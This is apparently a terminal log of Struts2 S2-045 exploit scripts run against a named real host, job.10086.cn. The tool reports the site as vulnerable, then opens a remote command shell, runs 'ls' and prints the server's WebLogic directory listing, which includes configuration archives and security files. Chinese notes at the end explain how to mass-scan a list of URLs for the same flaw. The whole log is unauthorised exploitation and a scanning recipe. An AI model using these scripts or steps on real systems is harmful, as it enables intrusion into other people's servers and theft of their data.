python s2_045.py http://job.10086.cn/company/anouncement/showAnouncement.action
>python s2_045_cmd.py http://job.10086.cn/company/anouncement/showAnouncement.action
[Loopholes exist] http://job.10086.cn/company/anouncement/showAnouncement.action
python s2_045_cmd.py http://job.10086.cn/company/anouncement/showAnouncement.action
>python s2_045_cmd.py http://job.10086.cn/company/anouncement/showAnouncement.action
[Loopholes exist] http://job.10086.cn/company/anouncement/showAnouncement.action
[cmd]>>ls
autodeploy
bin
career2.log
career2.log.2017-02-01
career2.log.2017-02-02
career2.log.2017-02-03
career2.log.2017-02-04
career2.log.2017-02-05
career2.log.2017-02-06
career2.log.2017-02-07
career2.log.2017-02-08
career2.log.2017-02-09
career2.log.2017-02-10
career2.log.2017-02-11
career2.log.2017-02-12
career2.log.2017-02-13
career2.log.2017-02-14
career2.log.2017-02-15
career2.log.2017-02-16
career2.log.2017-02-17
career2.log.2017-02-18
career2.log.2017-02-19
career2.log.2017-02-20
career2.log.2017-02-21
career2.log.2017-02-22
career2.log.2017-02-23
career2.log.2017-02-24
career2.log.2017-02-25
career2.log.2017-02-26
career2.log.2017-02-27
career2.log.2017-02-28
career2.log.2017-03-01
career2.log.2017-03-02
career2.log.2017-03-03
career2.log.2017-03-04
career2.log.2017-03-05
career2.log.2017-03-06
config
config20150826.tar.gz
config20151204.tar.gz
console-ext
edit.lok
fileRealm.properties
init-info
lib
pending
security
servers
shutdown.py
startManagedWebLogic_readme.txt
startWebLogic.sh
tmp
python S2_045_thread.py(填写url.txt后运行)
填写url.txt文件,每行一个url地址,运行完以后会生成一个result.txt文件存放存在漏洞的url